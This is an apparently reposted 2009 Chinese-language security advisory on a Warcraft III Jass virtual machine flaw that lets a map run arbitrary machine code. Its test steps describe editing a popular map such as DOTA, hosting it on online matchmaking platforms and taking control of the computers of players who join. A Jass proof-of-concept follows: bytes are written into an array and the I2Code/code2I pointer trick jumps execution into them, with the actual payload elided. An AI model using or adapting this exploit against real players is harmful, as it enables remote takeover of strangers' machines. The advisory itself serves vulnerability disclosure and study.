War3 Jass虚拟机执行任意机器码严重漏洞

来源:岁月联盟 编辑:zhuzhu 时间:2009-08-12
War3 Jass虚拟机执行任意机器码严重漏洞 发布时间:2009-08-09
影响版本:
War3 Jass漏洞描述:
Jass(正确地说是Jass2)是魔兽3的脚本语言, 用于控制地图的进程和行为, 是魔兽游戏和地图的基础. 正常的地图编辑中摆放的单位(Unit), 设置的触发(Trigger)等最终都会被翻译成Jass语言存在地图文件里在游戏时被调用.

Jass属于War3为地图开发者提供的一套脚本语言,方便开发者开发或建立修改属于自己的地图。
经过推断,CS (cstrike)可能也存在此类问题。<*参考
http://hi.baidu.com/ring04h/blog/item/0b6b172a05ffb3315343c18d.html
*>
测试方法:
[www.sebug.net]
本站提供程序(方法)可能带有安全性,仅供安全研究与教学之用,风险自负!登陆浩方或者VS对战平台,修改某张地图(例如DOTA的地图),开启游戏,等待其他玩家进入,开始游戏,即可执行任意机器码,控制玩家计算机。

set bj_meleeTwinkedHeroes[1024] = 0x90909090
set bj_meleeTwinkedHeroes[1025] = 0x90909090 //and other bytecode giberish.
...

local code C = I2Code( code2I(function GetRandomDirectionDeg) + 0xC92D8 )

call TriggerAddAction(t, C)
call TriggerExecute(t)

//It will run whatever bytecode 90 90 90 90 means

function main takes nothing returns nothing
set t = CreateTrigger()
call TriggerAddAction(t, i2code(0x00929217) )
a[0]=0x45623512
a[1]=0x34562323
a[2]=0x62329301
...
//other thousand lines of this
...
b[0]=0x12312333